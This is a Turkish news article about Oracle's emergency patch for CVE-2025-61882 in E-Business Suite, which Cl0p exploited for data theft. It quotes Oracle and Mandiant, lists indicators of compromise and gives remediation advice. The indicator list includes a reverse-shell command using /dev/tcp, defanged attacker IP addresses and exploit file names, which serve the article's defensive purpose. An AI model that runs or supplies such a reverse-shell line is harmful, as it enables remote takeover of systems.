Oracle, E-Business Suite’inde tespit edilen ve Cl0p siber suç grubu tarafından veri hırsızlığı saldırılarında aktif olarak kullanılan kritik güvenlik açığı için acil güncelleme yayınladı. CVE-2025-61882 kodu ile takip edilen bu açık, şirketlerin hassas verilerini ciddi risk altına sokuyor.
Kritik güvenlik açığının detayları
CVE-2025-61882 güvenlik açığı, 9.8 CVSS puanıyla kritik seviyede değerlendiriliyor. Açık, Oracle Concurrent Processing bileşeninde bulunuyor ve kimlik doğrulaması yapılmamış bir saldırganın HTTP üzerinden ağ erişimi ile sistemi ele geçirmesine olanak tanıyor.
Oracle’ın yayınladığı güvenlik bülteninde, “Bu güvenlik açığı kimlik doğrulaması olmadan uzaktan istismar edilebilir, yani kullanıcı adı ve şifreye ihtiyaç olmadan ağ üzerinden kullanılabilir. Başarıyla istismar edilirse, bu güvenlik açığı uzaktan kod yürütme ile sonuçlanabilir” açıklaması yer alıyor. Oracle’ın Güvenlik Müdürü Rob Duhart, ayrı bir uyarıda şirketin CVE-2025-61882 için yamalar yayınladığını ve “soruşturmamız sırasında keşfedilen ek potansiyel istismar olasılıklarına karşı güncellemeler sağladıklarını” belirtti.
Saldırı indikatörleri ve Scattered LAPSUS$ Hunters bağlantısı
Oracle, tehlike göstergeleri (IoC) olarak aşağıdaki IP adreslerini ve artefaktları paylaştı. Bu göstergeler, saldırılarda Scattered LAPSUS$ Hunters grubunun da muhtemel katılımına işaret ediyor:
- 200.107.207[.]26 (Potansiyel GET ve POST aktivitesi)
- 185.181.60[.]11 (Potansiyel GET ve POST aktivitesi)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Belirli bir port üzerinden giden TCP bağlantısı kurma)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Bu dosya isimleri ve komutlar, saldırganların sisteme sızmak ve kontrol sağlamak için kullandıkları araçları gösteriyor.
Oracle zero-day haberi, Cl0p ransomware grubunun Oracle E-Business Suite’i hedef alan yeni kampanyasına ilişkin raporların ortaya çıkmasından günler sonra geldi. Google’a ait Mandiant, devam eden aktiviteyi yüzlerce ele geçirilmiş hesaptan başlatılan “yüksek hacimli e-posta kampanyası” olarak tanımladı.
Google Cloud’da Mandiant CTO’su Charles Carmakal, LinkedIn’de paylaştığı gönderide şu açıklamalarda bulundu: “Cl0p, Oracle EBS’de birçok zafiyet sömürdü ve bu sayede Ağustos 2025’te birkaç kurbandan büyük miktarda veri çaldı. Oracle’ın Temmuz 2025 güncellemesinde yamalanan zafiyetlerin yanı sıra bu hafta sonu yamalanan CVE-2025-61882 dahil olmak üzere birden fazla zafiyet kullanıldı.”
Carmakal’ın uyarısı oldukça net: “Halihazırda gerçekleşmiş olan geniş çaplı zero-day istismarını (ve diğer aktörler tarafından muhtemelen devam edecek n-day istismarını) göz önünde bulundurarak, yamanın ne zaman uygulandığına bakılmaksızın, kuruluşlar zaten ele geçirilip geçirilmediklerini incelemelidir.” Bu uyarı, sadece güncelleme yapmanın yeterli olmadığını, kurumların geçmişe dönük olarak sistemlerini kontrol etmeleri gerektiğini vurguluyor. Saldırganlar, açığın yamalanmasından önce sistemlere sızmış ve kalıcı erişim sağlamış olabilir.
Raporlara göre, saldırı kampanyası yüksek hacimli ve koordineli bir şekilde yürütülüyor. Yüzlerce ele geçirilmiş hesabın kullanılması, saldırganların geniş bir ağa sahip olduğunu ve birçok kurumu aynı anda hedefleyebildiğini gösteriyor. Oracle E-Business Suite’in kurumsal dünyada yaygın kullanımı düşünüldüğünde, potansiyel etki alanı oldukça geniş.
Cl0p grubu, geçmişte de büyük ölçekli veri hırsızlığı kampanyalarıyla tanınıyor. Grubun bu yeni kampanyada hem eski hem de yeni güvenlik açıklarını birleştirerek kullanması, saldırı stratejilerinin geliştiğini gösteriyor.
Oracle’ın acil yamasını derhal uygulamak kritik önem taşıyor. Ancak Mandiant uzmanlarının da belirttiği gibi, yamayı uygulamak tek başına yeterli değil. Kurumların ayrıca:
- Sistem loglarını geriye dönük olarak incelemesi
- Paylaşılan IoC’leri kullanarak tehdit avı yapması
- Ağ trafiğinde anormal aktiviteleri kontrol etmesi
- E-Business Suite erişim kontrollerini gözden geçirmesi gerekiyor
Bu olay, kurumsal güvenlikte proaktif yaklaşımın ve sürekli izlemenin önemini bir kez daha ortaya koyuyor. Zero-day açıkların hızla weaponize edildiği günümüzde, güvenlik yamalarının zamanında uygulanması ve sistem güvenliğinin sürekli izlenmesi hayati önem taşıyor.
